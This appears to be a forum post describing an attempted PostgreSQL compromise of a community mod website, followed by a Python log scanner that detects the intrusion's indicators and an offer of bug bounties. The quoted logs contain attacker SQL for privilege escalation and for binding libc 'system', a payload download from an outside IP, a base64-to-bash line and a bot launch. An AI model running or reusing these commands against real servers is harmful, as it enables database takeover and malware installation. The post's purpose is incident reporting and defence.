Last night, while maintaining the community mod website, I noticed the database's memory usage spike. Checking the logs, I found a trojan file being pulled in from a foreign IP: a PostgreSQL exploitation attempt.
2026-05-20 14:19:32.975 UTC [11087] ERROR: syntax error at or near "CONNECT"
2026-05-20 14:19:32.975 UTC [11087] STATEMENT:
CREATE ROLE r0 LOGIN;
CREATE DATABASE rdb OWNER r0;
CREATE FUNCTION pwn() RETURNS trigger AS $$
BEGIN
IF current_setting('is_superuser') THEN
ALTER USER r0 SUPERUSER;
END IF;
END $$ LANGUAGE plpgsql;
2026-05-20 14:19:39.199 UTC [11230] FATAL:
password authentication failed for user "postgres"
DETAIL:
Connection matched file "/var/lib/postgresql/data/pg_hba.conf"
line 128: "host all all all scram-sha-256"
Connecting to 83.142.209.35 (83.142.209.35:80)
saving to 'kunt'
'kunt' saved
CREATE OR REPLACE FUNCTION system(cstring)
RETURNS int
AS '/lib/x86_64-linux-gnu/libc.so.6', 'system'
LANGUAGE 'c' STRICT;
echo ZnVuY3Rpb24g...
|base64 -d|bash
/tmp/bot
chmod +x /tmp/bot
./bot database1
kill -9
watchdog
redis
dockerd
httpd
2026-05-20 14:19:41.466 UTC [11087] ERROR:
could not access file "/lib/x86_64-linux-gnu/libc.so.6"
REFRESH MATERIALIZED VIEW CONCURRENTLY mv;
CREATE CONSTRAINT TRIGGER trig;
CREATE RULE "_RETURN";
Afterwards @HansJack changed the mod website's code so that the database is no longer exposed to the public internet.
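As an added example (not part of the original post and not @HansJack's code), here is a small Python scanner that groups a multi-line PostgreSQL log into events and flags the indicators visible in the excerpt above: a C-language function bound to a shared object, an ALTER USER ... SUPERUSER, a failed password authentication and the failed library load. The sample log is constructed to mirror the excerpt and is not the original log.

```python
import re

# Constructed sample log modelled on the excerpt above (not the original log).
SAMPLE_LOG = """\
2026-05-20 14:19:32.975 UTC [11087] STATEMENT:
CREATE ROLE r0 LOGIN;
CREATE FUNCTION pwn() RETURNS trigger AS $$
BEGIN IF current_setting('is_superuser') THEN ALTER USER r0 SUPERUSER; END IF; END $$ LANGUAGE plpgsql;
2026-05-20 14:19:39.199 UTC [11230] FATAL: password authentication failed for user "postgres"
2026-05-20 14:19:41.466 UTC [11087] ERROR: could not access file "/lib/x86_64-linux-gnu/libc.so.6"
2026-05-20 14:19:41.466 UTC [11087] STATEMENT:
CREATE OR REPLACE FUNCTION system(cstring) RETURNS int
AS '/lib/x86_64-linux-gnu/libc.so.6', 'system' LANGUAGE 'c' STRICT;
2026-05-20 14:20:01.000 UTC [11301] LOG: statement: SELECT count(*) FROM mods;
"""

HEADER = re.compile(r"^(\S+ \S+) UTC \[(\d+)\] ([A-Z]+):\s*(.*)$")

# Indicator rules, matched case-insensitively against each whole event (header plus continuation lines).
RULES = {
    "superuser_grant": r"ALTER\s+(USER|ROLE)\s+\S+\s+SUPERUSER",
    "c_language_function": r"CREATE\s+(OR\s+REPLACE\s+)?FUNCTION[\s\S]*LANGUAGE\s+'?c\b",
    "shared_object_load": r"\bAS\s+'[^']*\.so(\.\d+)*'",
    "auth_failure": r"password authentication failed",
    "library_access_error": r"could not access file",
}

def parse_events(text):
    # One event per header line; lines without a header (STATEMENT/DETAIL bodies) are appended to it.
    events = []
    for line in text.splitlines():
        m = HEADER.match(line)
        if m:
            events.append({"pid": int(m.group(2)), "level": m.group(3), "text": m.group(4)})
        elif events:  # continuation of the previous event
            events[-1]["text"] += "\n" + line
    return events

def scan(text):
    # (backend pid, rule name) for every event matching an indicator rule, in log order.
    return [(ev["pid"], name) for ev in parse_events(text)
            for name, pat in RULES.items() if re.search(pat, ev["text"], re.IGNORECASE)]

def sessions_to_review(text, min_hits=2):
    # Backend pids with at least min_hits distinct indicators: one failed login is noise,
    # a session that also loads libc into the server and grants SUPERUSER is not.
    by_pid = {}
    for pid, name in scan(text):
        by_pid.setdefault(pid, set()).add(name)
    return sorted(p for p, names in by_pid.items() if len(names) >= min_hits)
```

Run it over a real log with `scan(open("postgresql.log").read())`; a blocked backend still leaves the STATEMENT in the log, which is exactly what makes these rules useful after the fact.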
Technical folks are welcome to report vulnerabilities in the mod website; just DM @HansJack. Bounties are offered according to the vulnerability's severity (as things stood at the time):
- Game keys
- Steam gift cards
Help with developing the community mod website is equally welcome:
